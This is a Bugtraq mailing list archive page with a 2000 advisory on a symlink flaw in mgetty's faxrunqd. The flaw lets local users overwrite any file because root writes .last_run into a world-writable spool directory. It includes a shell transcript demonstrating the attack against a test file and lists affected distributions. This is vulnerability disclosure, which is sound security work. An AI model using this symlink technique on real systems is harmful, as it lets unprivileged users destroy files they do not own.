Bugtraq mailing list archives
Advisory: mgetty local compromise
From: Stan Bubrouski <satan () FASTDIAL NET>
Date: Sat, 26 Aug 2000 02:23:05 -0400
Author : Stan Bubrouski Date : August 26, 2000 Package : mgetty Versions affected : 1.1.22, 1.1.21 and prior (at least back to 1994) Severity : faxrunqd follows symbolic links when creating certain files. The default location for the files is /var/spool/fax/outgoing, which is a world-writable directory. Local users can destroy the contents of any file on a mounted filesystem because faxrunqd is usually run by root. Problem : mgetty comes with a program named faxrunqd, which is a daemon to send fax jobs queued by faxspool(1). Upon successful execution, a file named .last_run is created in the /var/spool/fax/outgoing/ directory which is world-writable. The problem lies in the fact faxrunqd will follow symlinks created by any user, allowing file creation anywhere and allowing existing files to be overwritten/destroyed. Example: Remote unprivilaged user: [user@king /tmp]$ id uid=200(user) gid=100(users) groups=100(users) [user@king /tmp]$ ls -al /var/spool/fax/outgoing total 3 drwxrwxrwt 3 root root 1024 Jun 2 18:46 . drwxr-xr-x 4 root root 1024 Jun 2 18:46 .. drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks [user@king /tmp]$ ls -al /etc/smash_me -rw-r--r-- 1 root root 12 Jun 2 18:45 /etc/smash_me [user@king /tmp]$ cat /etc/smash_me Smash me!!! [user@king /tmp]$ ln -s /etc/smash_me /var/spool/fax/outgoing/.last_run [user@king /tmp]$ ls -al /var/spool/fax/outgoing total 3 drwxrwxrwt 3 root root 1024 Jun 2 18:48 . drwxr-xr-x 4 root root 1024 Jun 2 18:46 .. lrwxrwxrwx 1 user users 13 Jun 2 18:48 .last_run -> /etc/smash_me drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks Root console: [root@king /tmp]# faxrunqd -l ttyS0 ... Remote unprivilaged user: [user@king /tmp]$ ls -al /var/spool/fax/outgoing total 3 drwxrwxrwt 3 root root 1024 Jun 2 18:48 . drwxr-xr-x 4 root root 1024 Jun 2 18:48 .. lrwxrwxrwx 1 user users 13 Jun 2 18:48 .last_run -> /etc/smash_me drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks [user@king /tmp]$ ls -al /etc/smash_me -rw-r--r-- 1 root root 44 Jun 2 18:48 /etc/smash_me [user@king /tmp]$ cat /etc/smash_me Fri Jun 2 18:48:47 2000 /usr/sbin/faxrunqd [user@king /tmp]$ Believed to be vulnerable: Red Hat Linux 6.2 and all prior versions (Vulnerable) Linux-Mandrake 7.1 and all prior versions (Vulnerable) Conectiva Linux 4.2, 5.0, and 5.1 (Untested) LinuxPPC 1999 and 2000 (Untested) TurboLinux 4.0, 6.0 (Untested) Debian 2.2 (potato), 2.1 (slink) (Untested) Yellow Dog Linux Champion Server 1.0, 1.1, 1.2 (Untested) MkLinux Pre Release 1 (R1) (Untested) Caldera OpenLinux 2.2, 2.3, 2.4 (Untested) Think Blue Linux 1.0 (Linux for the S/390) (Untested) OpenBSD 2.7? (mgetty is included in ports packages) NetBSD 1.4.2? FreeBSD? Probably others... Believed to be unaffected: SuSE - all versions Slackware - all versions
Current thread:
- Advisory: mgetty local compromise Stan Bubrouski (Aug 26)
- Re: Advisory: mgetty local compromise Gert Doering (Aug 26)
- Re: Advisory: mgetty local compromise Gert Doering (Aug 26)
- Re: Advisory: mgetty local compromise Stan Bubrouski (Aug 26)
- Re: Advisory: mgetty local compromise Gert Doering (Aug 26)
- Re: Advisory: mgetty local compromise Stan Bubrouski (Aug 29)
- Re: Advisory: mgetty local compromise Mark Stingley (Aug 30)
- Re: Advisory: mgetty local compromise Gert Doering (Aug 26)
- Re: Advisory: mgetty local compromise Cy Schubert - ITSD Open Systems Group (Aug 31)